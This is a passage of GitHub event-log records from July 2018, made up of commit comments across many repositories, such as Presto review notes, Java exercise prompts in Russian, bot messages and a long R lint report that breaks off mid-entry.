{"id":"7980881694","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29744579,"position":29,"line":117,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T06:22:34Z","updated_at":"2018-07-18T06:22:34Z","author_association":"NONE","body":"as a next step would you like to port this optimizer to become a rule?"}},"created_at":"2018-07-18T06:22:34Z"}
{"id":"7980882369","type":"CommitCommentEvent","actor":{"login":"valorad"},"repo":{"name":"valorad/RA2YR-wc-s-Revenge"},"payload":{"comment":{"id":29744580,"position":null,"line":null,"path":null,"commit_id":"bf584d2f9c73eb38605177b46430ca97f7690146","created_at":"2018-07-18T06:22:48Z","updated_at":"2018-07-18T06:22:48Z","author_association":"OWNER","body":"in response to #2 "}},"created_at":"2018-07-18T06:22:48Z"}
{"id":"7980903970","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29744620,"position":null,"line":null,"path":null,"commit_id":"be585200af8a76a5955c70c85b90068df93766ef","created_at":"2018-07-18T06:29:13Z","updated_at":"2018-07-18T06:29:13Z","author_association":"OWNER","body":"Task3\r\nexample 3 for courses Java\r\n\r\nСоздать программу, которая будет сообщать, является ли целое число, введенное пользователем, чётным или нечётным, простым или составным. Если пользователь введёт не целое число, то сообщать ему об ошибке."}},"created_at":"2018-07-18T06:29:13Z"}
{"id":"7980908062","type":"CommitCommentEvent","actor":{"login":"kokosing"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29744630,"position":31,"line":119,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/optimizations/TransformCorrelatedSingleRowSubqueryToProject.java","commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T06:30:22Z","updated_at":"2018-07-18T06:30:22Z","author_association":"NONE","body":"once you apply https://github.com/atris/presto/commit/36f52c404fafebdbabb38bc7af375076b39c9b9a#r29744567 this line should be removed"}},"created_at":"2018-07-18T06:30:22Z"}
{"id":"7980908888","type":"CommitCommentEvent","actor":{"login":"teleivo"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29744632,"position":2,"line":1,"path":"README.md","commit_id":"16b8325496b38fb968899c2321699029f836a3e2","created_at":"2018-07-18T06:30:37Z","updated_at":"2018-07-18T06:30:37Z","author_association":"COLLABORATOR","body":"@gtl90 please use this `[![Build Status](https://travis-ci.com/Bahmni/person-management-app.svg?branch=master)](https://travis-ci.com/Bahmni/person-management-app)`\r\n\r\nthe current one is wrong, if you click on it in the readme you will see that  **travis-ci.org** says the repo is not active. it is active in **travis-ci.com**"}},"created_at":"2018-07-18T06:30:37Z"}
{"id":"7980910499","type":"CommitCommentEvent","actor":{"login":"connordeckers"},"repo":{"name":"UTAS-HealthSciences/mylo-mate"},"payload":{"comment":{"id":29744634,"position":null,"line":null,"path":null,"commit_id":"67ee6a015048a2c67f47e4a4130009838ce4f3e3","created_at":"2018-07-18T06:31:05Z","updated_at":"2018-07-18T06:31:05Z","author_association":"CONTRIBUTOR","body":"Forgot to add tags throughout the merge process.\r\n"}},"created_at":"2018-07-18T06:31:05Z"}
{"id":"7980914790","type":"CommitCommentEvent","actor":{"login":"connordeckers"},"repo":{"name":"UTAS-HealthSciences/mylo-mate"},"payload":{"comment":{"id":29744639,"position":null,"line":null,"path":null,"commit_id":"67ee6a015048a2c67f47e4a4130009838ce4f3e3","created_at":"2018-07-18T06:32:18Z","updated_at":"2018-07-18T06:32:18Z","author_association":"CONTRIBUTOR","body":"Adds changes suggested in issue #134 "}},"created_at":"2018-07-18T06:32:18Z"}
{"id":"7980915642","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29744644,"position":null,"line":null,"path":null,"commit_id":"36f52c404fafebdbabb38bc7af375076b39c9b9a","created_at":"2018-07-18T06:32:32Z","updated_at":"2018-07-18T06:32:32Z","author_association":"OWNER","body":"Thanks, let me get onto these changes and push"}},"created_at":"2018-07-18T06:32:32Z"}
{"id":"7980915875","type":"CommitCommentEvent","actor":{"login":"kraxyyy"},"repo":{"name":"kraxyyy/dojogame"},"payload":{"comment":{"id":29744645,"position":null,"line":null,"path":null,"commit_id":"2d64408efeb7c23bd90304c9db9c1af3bf677e2a","created_at":"2018-07-18T06:32:35Z","updated_at":"2018-07-18T06:32:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Issue #123](https://trello.com/c/1i2r7pZ7/10-issue-123)"}},"created_at":"2018-07-18T06:32:35Z"}
{"id":"7980918070","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29744657,"position":null,"line":null,"path":null,"commit_id":"3d3939a1b92cf208c32bdf789e1898f8065cbbf0","created_at":"2018-07-18T06:33:14Z","updated_at":"2018-07-18T06:33:14Z","author_association":"COLLABORATOR","body":"I updated the scheme. make it prettier.\r\n\r\nregarding the species issue, do label each edge or node with a single species but not with multiple species which I suggested yesterday. \r\n\r\nif we do, :Protein:Mouse:Human, it is hard to continue to code the corresponding scores which are different for different species. \r\n\r\nmay be better still to separate the graphs for each species but provide species label accordingly.\r\n\r\nwhat do you think?\r\n\r\nwe can test this way with some query example later, let's say whether it is a reasonable way.\r\n\r\nyou need to start to look at https://string-db.org/cgi/download.pl?sessionId=jGEI7TPRarVL&species_text=Homo+sapiens and https://string-db.org/cgi/download.pl?sessionId=jGEI7TPRarVL&species_text=Mus+musculus\r\n\r\nfind the most relevant file and think about how to process them.\r\n\r\nI find their scheme https://stringdb-static.org/download/database.schema.v10.5.pdf\r\n\r\nshould be helpful. try to keep their naming in the graph database.\r\n\r\n"}},"created_at":"2018-07-18T06:33:14Z"}
{"id":"7980918803","type":"CommitCommentEvent","actor":{"login":"WuHuaJian"},"repo":{"name":"WuHuaJian/python"},"payload":{"comment":{"id":29744661,"position":null,"line":null,"path":null,"commit_id":"0c36b68674c6b3c8f18e9b76c4a8a863700fabe5","created_at":"2018-07-18T06:33:26Z","updated_at":"2018-07-18T06:33:26Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-18T06:33:26Z"}
{"id":"7980922775","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29744674,"position":null,"line":null,"path":null,"commit_id":"fab099feb8926e5fb85716cf517664879cf815d6","created_at":"2018-07-18T06:34:31Z","updated_at":"2018-07-18T06:34:31Z","author_association":"OWNER","body":"I submitted this as [0,4] as Rocky suggested, although it changes mob ratio modifier a bit."}},"created_at":"2018-07-18T06:34:31Z"}
{"id":"7980923057","type":"CommitCommentEvent","actor":{"login":"yankielmc"},"repo":{"name":"spesmilo/electrum"},"payload":{"comment":{"id":29744675,"position":null,"line":null,"path":null,"commit_id":"8bb59fcc3c235d971df9669afc1d7ac5a226e6ba","created_at":"2018-07-18T06:34:36Z","updated_at":"2018-07-18T06:34:36Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-18T06:34:36Z"}
{"id":"7980923507","type":"CommitCommentEvent","actor":{"login":"Andrew-Yu1"},"repo":{"name":"Microsoft/CNTK"},"payload":{"comment":{"id":29744676,"position":null,"line":null,"path":null,"commit_id":"6e265dae47ded0106e8cd09036b3e87fa03eb4cc","created_at":"2018-07-18T06:34:43Z","updated_at":"2018-07-18T06:34:43Z","author_association":"NONE","body":"Print 'Hello'"}},"created_at":"2018-07-18T06:34:43Z"}
{"id":"7980925240","type":"CommitCommentEvent","actor":{"login":"connordeckers"},"repo":{"name":"UTAS-HealthSciences/mylo-mate"},"payload":{"comment":{"id":29744679,"position":null,"line":null,"path":null,"commit_id":"af45ab582e80a1e712dcdfb5ac4d68d1b27055f3","created_at":"2018-07-18T06:35:13Z","updated_at":"2018-07-18T06:35:13Z","author_association":"CONTRIBUTOR","body":"Adds changes suggested in issue #134 "}},"created_at":"2018-07-18T06:35:13Z"}
{"id":"7980927310","type":"CommitCommentEvent","actor":{"login":"connordeckers"},"repo":{"name":"UTAS-HealthSciences/mylo-mate"},"payload":{"comment":{"id":29744684,"position":null,"line":null,"path":null,"commit_id":"c4025e7be4f039968908f700932b2bc292574e64","created_at":"2018-07-18T06:35:49Z","updated_at":"2018-07-18T06:35:49Z","author_association":"CONTRIBUTOR","body":"[WIP] Adds dots back to the Dev2 server. UNTESTED IN LIVE. NOT TO BE RELEASED YET.\r\nSee issue #131 "}},"created_at":"2018-07-18T06:35:49Z"}
{"id":"7980932084","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"yegor256/jpeek"},"payload":{"comment":{"id":29744695,"position":null,"line":null,"path":null,"commit_id":"48fcf32ce4d5b11f19dc9b8909bde91cfbf80dce","created_at":"2018-07-18T06:37:12Z","updated_at":"2018-07-18T06:37:12Z","author_association":"COLLABORATOR","body":"Puzzle `90-29fbce76` disappeared from [`src/test/java/org/jpeek/MetricsTest.java`](https://github.com/yegor256/jpeek/blob/master/src/test/java/org/jpeek/MetricsTest.java), that's why I closed #203. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-18T06:37:12Z"}
{"id":"7980934914","type":"CommitCommentEvent","actor":{"login":"ryanrhee"},"repo":{"name":"lightstep/opentracing-swift"},"payload":{"comment":{"id":29744703,"position":null,"line":null,"path":null,"commit_id":"76c962f77921c9c2e0c094e786dcac855fcfac8f","created_at":"2018-07-18T06:38:02Z","updated_at":"2018-07-18T06:38:02Z","author_association":"COLLABORATOR","body":"looks like you were on an old rev, this ended up being a no-op commit"}},"created_at":"2018-07-18T06:38:02Z"}
{"id":"7980935482","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29744705,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-18T06:38:12Z","updated_at":"2018-07-18T06:38:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-18T06:38:12Z"}
{"id":"7980935553","type":"CommitCommentEvent","actor":{"login":"OSchenlin"},"repo":{"name":"OSchenlin/chenlin"},"payload":{"comment":{"id":29744706,"position":null,"line":null,"path":null,"commit_id":"aaf947774583e0432762c09b2cf47b372503659c","created_at":"2018-07-18T06:38:13Z","updated_at":"2018-07-18T06:38:13Z","author_association":"OWNER","body":"同意"}},"created_at":"2018-07-18T06:38:13Z"}
{"id":"7980937430","type":"CommitCommentEvent","actor":{"login":"KabiriDorsa"},"repo":{"name":"KabiriDorsa/AP_final_project"},"payload":{"comment":{"id":29744711,"position":4,"line":4,"path":"README.md","commit_id":"bb578b541464e197f2178c442870f5c1cdb7e2e4","created_at":"2018-07-18T06:38:47Z","updated_at":"2018-07-18T06:38:47Z","author_association":"OWNER","body":"This is a final project for advanced_programming  course under supervisory of Dr.Jahanshahi.\r\nauthors: \r\nShakiba  Tasharrofi , Dorsa Kabiri"}},"created_at":"2018-07-18T06:38:47Z"}
{"id":"7980937757","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29744712,"position":null,"line":null,"path":null,"commit_id":"ce375b270b8afe2966f8083e40cbbc7137735a6e","created_at":"2018-07-18T06:38:53Z","updated_at":"2018-07-18T06:38:53Z","author_association":"OWNER","body":"Task4\r\nexample 4 for courses Java\r\n\r\nНаписать программу выводящую на экран все четные числа и их сумму из последовательности от 0 до N. N вводится вручную."}},"created_at":"2018-07-18T06:38:53Z"}
{"id":"7980940976","type":"CommitCommentEvent","actor":{"login":"w7788129"},"repo":{"name":"coinbigapi/coinbigapi"},"payload":{"comment":{"id":29744718,"position":39,"line":39,"path":"API示例/Java/client-demo-1/src/test/java/com/example/demo/Demo1.java","commit_id":"5b9b5f5e4867d9b03fb51aad0828277436034a24","created_at":"2018-07-18T06:39:50Z","updated_at":"2018-07-18T06:39:50Z","author_association":"NONE","body":"c821db84-6fbd-11e4-a9e3-c86000d26d7c"}},"created_at":"2018-07-18T06:39:50Z"}
{"id":"7980943299","type":"CommitCommentEvent","actor":{"login":"straight-shoota"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29744723,"position":10,"line":63,"path":"spec/config_spec.cr","commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-18T06:40:30Z","updated_at":"2018-07-18T06:40:30Z","author_association":"CONTRIBUTOR","body":"Guys, don't over engineer it. A version must be present, that's all. There should not be any hard coded value or format expectations. It's pretty much useless. Better work on something that actually improves things."}},"created_at":"2018-07-18T06:40:30Z"}
{"id":"7980945519","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29744727,"position":9,"line":9,"path":"Lesson1/quadratic_equation.rb","commit_id":"ea4accb0ed02a76100a6e3bff9bc1eea2488b37a","created_at":"2018-07-18T06:41:06Z","updated_at":"2018-07-18T06:41:06Z","author_association":"NONE","body":"И не оставляй пробелы вокруг аргумента метода"}},"created_at":"2018-07-18T06:41:06Z"}
{"id":"7980952312","type":"CommitCommentEvent","actor":{"login":"shivam-munchi"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29744737,"position":64,"line":64,"path":"app/src/main/java/com/example/delhivery/newsapp/DetailActivity.java","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-18T06:42:56Z","updated_at":"2018-07-18T06:42:56Z","author_association":"OWNER","body":"Done. Used it.\r\n"}},"created_at":"2018-07-18T06:42:56Z"}
{"id":"7980956558","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29744742,"position":null,"line":null,"path":null,"commit_id":"a24b9981c6850341b83ffa33fda6c6894402f97f","created_at":"2018-07-18T06:44:09Z","updated_at":"2018-07-18T06:44:09Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/ipad-mention-off-screen-in-portrait-orientation/73784/12\n"}},"created_at":"2018-07-18T06:44:09Z"}
{"id":"7980957015","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29744744,"position":15,"line":15,"path":"Lesson1/quadratic_equation.rb","commit_id":"ea4accb0ed02a76100a6e3bff9bc1eea2488b37a","created_at":"2018-07-18T06:44:17Z","updated_at":"2018-07-18T06:44:17Z","author_association":"NONE","body":"после elsif оставь пробел, и посмотри, что-б везде были отступы в 2 пробела, а не 2 таба. Найди в интернете как сделать soft tabs для твоего редактора"}},"created_at":"2018-07-18T06:44:17Z"}
{"id":"7980957524","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Tasks"},"payload":{"comment":{"id":29744746,"position":null,"line":null,"path":null,"commit_id":"9dea3c2e024aaf56c7267d5a5146e07336655e89","created_at":"2018-07-18T06:44:24Z","updated_at":"2018-07-18T06:44:24Z","author_association":"OWNER","body":"Task5\r\nexample 5 for courses Java\r\n\r\nНаписать программу, которая в последовательности от 0 до N, находит все числа-палиндромы (зеркальное значение равно оригинальному). Длина последовательности вводится вручную и не должна превышать 100."}},"created_at":"2018-07-18T06:44:24Z"}
{"id":"7980960119","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29744749,"position":null,"line":null,"path":null,"commit_id":"85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755","created_at":"2018-07-18T06:45:05Z","updated_at":"2018-07-18T06:45:05Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save 